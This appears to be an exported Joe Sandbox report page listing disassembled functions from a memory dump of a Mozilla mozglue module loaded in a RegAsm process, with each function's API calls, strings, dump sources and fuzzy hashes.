Opcode ID: 4cb95d8ed9acba316380679b92283aa5e2524c2417264ae0651876a675aa4bad
Instruction ID: 43d6fce3df63b8ddbb5ceff7e112917ff94b861f2eafbceec437715edb1f0801
Opcode Fuzzy Hash: 4cb95d8ed9acba316380679b92283aa5e2524c2417264ae0651876a675aa4bad
Instruction Fuzzy Hash: 0AA128B0A083448FDB12DF69C4D07EEBBF1AF59318F14806CD8956BB41D739A946CBA1

Function 6C130180 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151threadCOMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6C130270
GetCurrentThreadId.KERNEL32 ref: 6C1302E9
AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C1302F6
ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C13033A

Strings

about:blank, xrefs: 6C13020F

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID: about:blank
API String ID: 2047719359-258612819
Opcode ID: 5082a6998f0f6c550a763b6ca153707e399ade4186f4d4c06240d3a163f3c4c7
Instruction ID: 115b6f1ae03e51a1c5cbf24ad6c8c843161b3ad0e59db7d52efe1a9924eb7953
Opcode Fuzzy Hash: 5082a6998f0f6c550a763b6ca153707e399ade4186f4d4c06240d3a163f3c4c7
Instruction Fuzzy Hash: 6151C271A00229CFCB00DF59C480AAAB7F5FF49318F245519D82AA7B41D731FD46CB94

Function 6C12E100 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0F4A68), ref: 6C12945E
Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C129470
Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C129482
Part of subcall function 6C129420: __Init_thread_footer.LIBCMT ref: 6C12949F

GetCurrentThreadId.KERNEL32 ref: 6C12E12F
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,6C12E084,00000000), ref: 6C12E137

Part of subcall function 6C1294D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1294EE
Part of subcall function 6C1294D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C129508

?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE ref: 6C12E196
?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE(?,?,?,?,?,?,?,?), ref: 6C12E1E9

Part of subcall function 6C1299A0: GetCurrentThreadId.KERNEL32 ref: 6C1299C1
Part of subcall function 6C1299A0: AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C1299CE
Part of subcall function 6C1299A0: ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C1299F8

Strings

[I %d/%d] WriteProfileToJSONWriter, xrefs: 6C12E13F

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: getenv$?profiler_stream_json_for_this_process@baseprofiler@mozilla@@CurrentExclusiveLockSpliceableThreadWriter@12@$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [I %d/%d] WriteProfileToJSONWriter
API String ID: 2491745604-3904374701
Opcode ID: 19453db3f4851daace5387c213e163de6eecb9405360a2a4199846fbec0cd30f
Instruction ID: 7dc13b2431aa835da4d0131073c63ab9f0f242b1dc8cfc3441fbcd9778602d9b
Opcode Fuzzy Hash: 19453db3f4851daace5387c213e163de6eecb9405360a2a4199846fbec0cd30f
Instruction Fuzzy Hash: 453139B56043009FC700EF2985013AAF7E5AFDA30CF50842DE8655BB41DB74D989C793

Function 6C11F440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C11F480

Part of subcall function 6C0EF100: LoadLibraryW.KERNEL32(shell32,?,6C15D020), ref: 6C0EF122
Part of subcall function 6C0EF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C0EF132

CloseHandle.KERNEL32(00000000), ref: 6C11F555

Part of subcall function 6C0F14B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C0F1248,6C0F1248,?), ref: 6C0F14C9
Part of subcall function 6C0F14B0: memcpy.VCRUNTIME140(?,6C0F1248,00000000,?,6C0F1248,?), ref: 6C0F14EF

Part of subcall function 6C0EEEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C0EEEE3

CreateFileW.KERNEL32 ref: 6C11F4FD
GetFileInformationByHandle.KERNEL32(00000000), ref: 6C11F523

Strings

\oleacc.dll, xrefs: 6C11F4CB

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
String ID: \oleacc.dll
API String ID: 2595878907-3839883404
Opcode ID: 8a8f10a2d7acdd7afffee24bc1cd8c1caeebfb0b23f53e60980e1784171697c3
Instruction ID: 37c491e82e961ad46ee22ab7d3a5032c209b99a35d014cdfbc9bf7ff5830d64b
Opcode Fuzzy Hash: 8a8f10a2d7acdd7afffee24bc1cd8c1caeebfb0b23f53e60980e1784171697c3
Instruction Fuzzy Hash: 1141A070608710DFE760DF29C884B9BB7F4AF95318F500A2CF5A183A50EB34E949CB92

Function 6C120210 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(?), ref: 6C120222
moz_xmalloc.MOZGLUE(0000000C), ref: 6C120231

Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C12028B
RtlFreeHeap.NTDLL ref: 6C1202F7

Strings

@, xrefs: 6C1202D8

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireFreeHeapReleasemallocmoz_xmalloc
String ID: @
API String ID: 2782572024-2766056989
Opcode ID: 3a8902144aae1ab62412a80a53f5c050c3c9632641c53c1d1c116581bd0aafae
Instruction ID: 416554bb7b513c4b792bb8b8814c9889f310535dce1cf67fc53e6dc4f0ee78e3
Opcode Fuzzy Hash: 3a8902144aae1ab62412a80a53f5c050c3c9632641c53c1d1c116581bd0aafae
Instruction Fuzzy Hash: B131DDB5A002108FEB54CF59C890B2AB7F1FF54318B24862ED96ADBB40D734EC81CB90

Function 6C12E020 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0F4A68), ref: 6C12945E
Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C129470
Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C129482
Part of subcall function 6C129420: __Init_thread_footer.LIBCMT ref: 6C12949F

GetCurrentThreadId.KERNEL32 ref: 6C12E047
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C12E04F

Part of subcall function 6C1294D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1294EE
Part of subcall function 6C1294D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C129508

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C12E09C
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C12E0B0

Strings

[I %d/%d] profiler_get_profile, xrefs: 6C12E057

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: getenv$free$CurrentInit_thread_footerThread__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [I %d/%d] profiler_get_profile
API String ID: 1832963901-4276087706
Opcode ID: b3443e069bf9dd5926827d712216a6a04e7fe67f39b1d5f6784272b5866740a1
Instruction ID: 5b27e84695aa292446712a2cea236362cecadd02ba0099138afd3ee7328ef179
Opcode Fuzzy Hash: b3443e069bf9dd5926827d712216a6a04e7fe67f39b1d5f6784272b5866740a1
Instruction Fuzzy Hash: A921C278B001488FDF04DF75C858AAEBBB5AF45209F144029ED0A97741DB39EA4AC7E5

Function 6C1474A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000000), ref: 6C147526
__Init_thread_footer.LIBCMT ref: 6C147566
__Init_thread_footer.LIBCMT ref: 6C147597

Strings

kernel32.dll, xrefs: 6C147557
UnmapViewOfFile2, xrefs: 6C147552

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Init_thread_footer$ErrorLast
String ID: UnmapViewOfFile2$kernel32.dll
API String ID: 3217676052-1401603581
Opcode ID: b82a6bd843cd5d248d1811b85a62e5bd19b8902f9af255f352663941db65ff98
Instruction ID: 44c63c70fad2b3f25464980a08362f3b1346128498278b555fc7042412d099d7
Opcode Fuzzy Hash: b82a6bd843cd5d248d1811b85a62e5bd19b8902f9af255f352663941db65ff98
Instruction Fuzzy Hash: 2E213436B08540EBCA14CFABC819FA973B5FB46338F05C52AE8158BF40C735A802D6D5

Function 6C14AB90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SearchPathW.KERNEL32(?,6C10BFBD,.dll,00000000,00000000,00000000,6C10BFBD), ref: 6C14ABBD
moz_xmalloc.MOZGLUE(00000001), ref: 6C14ABD8

Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26

memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C14ABEB
SearchPathW.KERNEL32(?,?,.dll,00000001,?,00000000), ref: 6C14AC03

Strings

.dll, xrefs: 6C14ABB4, 6C14ABFA

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: PathSearch$mallocmemsetmoz_xmalloc
String ID: .dll
API String ID: 3063185715-2738580789
Opcode ID: 1ea31e899dd60fa1f5158c70495a855198d3e6e3b59415009e05a84077cbe007
Instruction ID: ec829bd3cec802bcd1f5eed94e8437dfd5cb17008873cb5b62095e335d08bee4
Opcode Fuzzy Hash: 1ea31e899dd60fa1f5158c70495a855198d3e6e3b59415009e05a84077cbe007
Instruction Fuzzy Hash: 4801F5B2A0010A6FEB019E798C49BBFB7ADEF85354F054035FC04D3600E7769C544BA1

Function 6C14A7A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C16F770,-00000001,?,6C15E330,?,6C10BDF7), ref: 6C14A7AF
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6C10BDF7), ref: 6C14A7C2
moz_xmalloc.MOZGLUE(00000018,?,6C10BDF7), ref: 6C14A7E4
LeaveCriticalSection.KERNEL32(6C16F770), ref: 6C14A80A

Strings

accelerator.dll, xrefs: 6C14A7BF

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
String ID: accelerator.dll
API String ID: 2442272132-2426294810
Opcode ID: 8a9156871b9898c604cb41ce415881d87a10d0a66f80da471922a7e33899f07e
Instruction ID: d7c20d63e5ab113c38c35080e74031b1749c5415928bae827b5b5b35a666e763
Opcode Fuzzy Hash: 8a9156871b9898c604cb41ce415881d87a10d0a66f80da471922a7e33899f07e
Instruction Fuzzy Hash: ED01A2B16003049FDF04CF56D884E21B7B8FB8A316706C07AE9198B701DB71A810DBA0

Function 6C0EF0A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ole32,?,6C0EEE51,?), ref: 6C0EF0B2
GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6C0EF0C2

Strings

Could not find CoTaskMemFree, xrefs: 6C0EF0E3
Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6C0EF0DC
ole32, xrefs: 6C0EF0AD

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
API String ID: 2574300362-1578401391
Opcode ID: 3bfb20f66e9efb3b1a369536cc13f521f301b5a8d9056295f1006bf654cbd532
Instruction ID: 58dc613debffbcbeca8b3c7a1284527ca47165bee15c6370b24585466fc841e4
Opcode Fuzzy Hash: 3bfb20f66e9efb3b1a369536cc13f521f301b5a8d9056295f1006bf654cbd532
Instruction Fuzzy Hash: AAE04F717853019FAF045AA7A81CB3A37FD6B1A20D324842EF512D1E00EB21D420E672

Function 6C120080 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C0F7204), ref: 6C120088
GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext2), ref: 6C1200A7
FreeLibrary.KERNEL32(?,6C0F7204), ref: 6C1200BE

Strings

wintrust.dll, xrefs: 6C120083
CryptCATAdminAcquireContext2, xrefs: 6C1200A1

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminAcquireContext2$wintrust.dll
API String ID: 145871493-3385133079
Opcode ID: 6c865928e6e065b0cd0bbf5e0b529c7b5b014e6c129b9d6fd19affff24a6a2bf
Instruction ID: 9555705fcc46607b3efc74d28366cd249220ebf58cb943debb009fd3ded11c17
Opcode Fuzzy Hash: 6c865928e6e065b0cd0bbf5e0b529c7b5b014e6c129b9d6fd19affff24a6a2bf
Instruction Fuzzy Hash: EDE092786417059BEF10AF67D818735BAFCA70B389F104156A925C2B51EBB9C060BB15

Function 6C1200D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C0F7235), ref: 6C1200D8
GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6C1200F7
FreeLibrary.KERNEL32(?,6C0F7235), ref: 6C12010E

Strings

wintrust.dll, xrefs: 6C1200D3
CryptCATAdminCalcHashFromFileHandle2, xrefs: 6C1200F1

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
API String ID: 145871493-2559046807
Opcode ID: 1a66ce603c9d6493553ba146064a39447bca735c6d1a0eb524a3e03ae14a6f5a
Instruction ID: de20dc6ebbb47fa03c2922b92746bfed3a0dcbde42a06b0de9c6477335f1624d
Opcode Fuzzy Hash: 1a66ce603c9d6493553ba146064a39447bca735c6d1a0eb524a3e03ae14a6f5a
Instruction Fuzzy Hash: 23E0B6787453169BEF009F6BCA197317AFEB747249F544456AD6A81B40EBB8C0A0FB10

Function 6C120120 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C0F7297), ref: 6C120128
GetProcAddress.KERNEL32(00000000,CryptCATAdminEnumCatalogFromHash), ref: 6C120147
FreeLibrary.KERNEL32(?,6C0F7297), ref: 6C12015E

Strings

wintrust.dll, xrefs: 6C120123
CryptCATAdminEnumCatalogFromHash, xrefs: 6C120141

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminEnumCatalogFromHash$wintrust.dll
API String ID: 145871493-1536241729
Opcode ID: c1e54cdaedc26627d9922119e3bfc8411a26026d46fc2f0354b237fd1bb8945c
Instruction ID: 9aebe74ffe3f9502e2ccd6884c4d98148517d08aa8bcb203d2976404dc58c77f
Opcode Fuzzy Hash: c1e54cdaedc26627d9922119e3bfc8411a26026d46fc2f0354b237fd1bb8945c
Instruction Fuzzy Hash: D2E01A746052459BEF005F2BD91C7223EFCA703308F004155A915C2B00D775C064BB10

Function 6C120170 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C0F7308), ref: 6C120178
GetProcAddress.KERNEL32(00000000,CryptCATCatalogInfoFromContext), ref: 6C120197
FreeLibrary.KERNEL32(?,6C0F7308), ref: 6C1201AE

Strings

wintrust.dll, xrefs: 6C120173
CryptCATCatalogInfoFromContext, xrefs: 6C120191

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATCatalogInfoFromContext$wintrust.dll
API String ID: 145871493-3354427110
Opcode ID: 3bb7efd068f099e7a51accd323858a964b800b696a7c72af5c0439fe68102210
Instruction ID: 328ec714d0ed52cedba9b9a70e80ce2bdcf6b0dce8165849be033387e01a5884
Opcode Fuzzy Hash: 3bb7efd068f099e7a51accd323858a964b800b696a7c72af5c0439fe68102210
Instruction Fuzzy Hash: B0E09A746852059BEF405F67C918B217BFCB757249F100096E9A581B40E778C0E0FA20

Function 6C1201C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C0F7266), ref: 6C1201C8
GetProcAddress.KERNEL32(00000000,CryptCATAdminReleaseContext), ref: 6C1201E7
FreeLibrary.KERNEL32(?,6C0F7266), ref: 6C1201FE

Strings

wintrust.dll, xrefs: 6C1201C3
CryptCATAdminReleaseContext, xrefs: 6C1201E1

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminReleaseContext$wintrust.dll
API String ID: 145871493-1489773717
Opcode ID: d907dd5214ba8a251642c5fa101ff17d2a22629fe3f87eb6366a64c397333397
Instruction ID: 17664b91517ab2c41a5254c84675cc1a10b9dc40803fa890a222050e5cdd3336
Opcode Fuzzy Hash: d907dd5214ba8a251642c5fa101ff17d2a22629fe3f87eb6366a64c397333397
Instruction Fuzzy Hash: D3E09A756813859BEF009F67C91C7227AFCAB17349F504559E925C1B81DB74C060BB10

Function 6C14C410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C14C0E9), ref: 6C14C418
GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C14C437
FreeLibrary.KERNEL32(?,6C14C0E9), ref: 6C14C44C

Strings

NtQueryVirtualMemory, xrefs: 6C14C431
ntdll.dll, xrefs: 6C14C413

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtQueryVirtualMemory$ntdll.dll
API String ID: 145871493-2623246514
Opcode ID: 93a8d6bc48e4a78a83927e1171a0875ba546a0ace3220f09299bc2b853034848
Instruction ID: 9b416b3d19803837be112a5a9475e1cc32bbf28a87adb5f8db6643dad3053efe
Opcode Fuzzy Hash: 93a8d6bc48e4a78a83927e1171a0875ba546a0ace3220f09299bc2b853034848
Instruction Fuzzy Hash: F9E092B06013019BDB006B738A287397AFCB756208F049156AA2491B00EBB5C034AA50

Function 6C1475B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C14748B,?), ref: 6C1475B8
GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C1475D7
FreeLibrary.KERNEL32(?,6C14748B,?), ref: 6C1475EC

Strings

ntdll.dll, xrefs: 6C1475B3
RtlNtStatusToDosError, xrefs: 6C1475D1

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

